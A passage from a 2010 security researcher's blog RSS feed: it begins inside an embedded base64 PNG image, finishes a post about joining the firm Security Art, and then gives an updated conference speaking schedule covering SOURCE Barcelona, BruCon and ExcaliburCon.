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" alt="" width="160" height="120" />ing with great people, find solutions that make sense for everything security related, and keep that great mix of business, marketing and hardcore technology. Security Art has managed to build a rock-star team of professionals (some of which I personally helped recruit) and I’m excited to be able to formalize this relationship and be able to offer even more to our existing and new customers, partners and colleagues.   If you have any questions, opportunities or any other topic you’d like to discuss related to this please feel free to contact me personally. We are gearing up to announce even more exciting news pretty soon as we are expanding our line of business. Keep an eye on <span style="text-decoration: underline;"><a href="http://www.security-art.com">www.security-art.com</a></span> or follow us on LinkedIn&#8230;</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/' rel='bookmark' title='Permanent Link: Cloud Security Alliance Conference (Israel) &#8211; CFP'>Cloud Security Alliance Conference (Israel) &#8211; CFP</a></li>
<li><a href='http://www.iamit.org/blog/2009/01/social-networking-strikes-again/' rel='bookmark' title='Permanent Link: Social networking strikes again'>Social networking strikes again</a></li>
<li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/08/security-innovation-is-an-art-now/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Updated speaking schedule!</title>
		<link>http://www.iamit.org/blog/2010/08/updated-speaking-schedule/</link>
		<comments>http://www.iamit.org/blog/2010/08/updated-speaking-schedule/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 06:43:39 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[BruCon]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[defcon]]></category>
		<category><![CDATA[Excaliburcon]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Source]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/08/updated-speaking-schedule/</guid>
		<description><![CDATA[As noted before, for some reason beyond my understanding I am going to be speaking at both SOURCE Barcelona and Brucon in September, as well as in Excaliburcon in China (you guys must really like this whole crime meets state thing huh?). So, down to business, SOURCE Barcelona is going to be awesome &#8211; It’s [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/05/upcoming-conference-schedule/' rel='bookmark' title='Permanent Link: Upcoming Conference Schedule'>Upcoming Conference Schedule</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/' rel='bookmark' title='Permanent Link: The community to the rescue again'>The community to the rescue again</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>As <a href="http://www.iamit.org/blog/2010/05/upcoming-conference-schedule/">noted before</a>, for some reason beyond my understanding I am going to be speaking at both SOURCE Barcelona and Brucon in September, as well as in Excaliburcon in China (you guys must really like this whole crime meets state thing huh?).</p>
<p><img class="alignright" title="Source logo" src="http://www.sourceconference.com/templates/rt_nexus_j15_green/images/header/dark/logo.png" alt="" width="244" height="61" />So, down to business, <a href="http://www.sourceconference.com/index.php/barcelona-2010/register">SOURCE Barcelona</a> is going to be awesome &#8211; It’s going to be my first SOURCE I’m really looking forward to getting back together with some of my friends (<a href="http://www.sourceconference.com/index.php/barcelona-2010/bcn2010-schedule#AndrewChris">Chris</a>, <a href="http://www.sourceconference.com/index.php/barcelona-2010/bcn2010-schedule#WimRemes">Wim</a>, <a href="http://www.sourceconference.com/index.php/barcelona-2010/bcn2010-schedule#jayson">Jayson</a>&#8230; the old Wuxi pwnage team en-scale), and meet people I wanted to pick their brains in person (<a href="http://www.sourceconference.com/index.php/barcelona-2010/bcn2010-schedule#BrianH">Brian Honan</a> &#8211; especially because I’ll miss his talk&#8230;).</p>
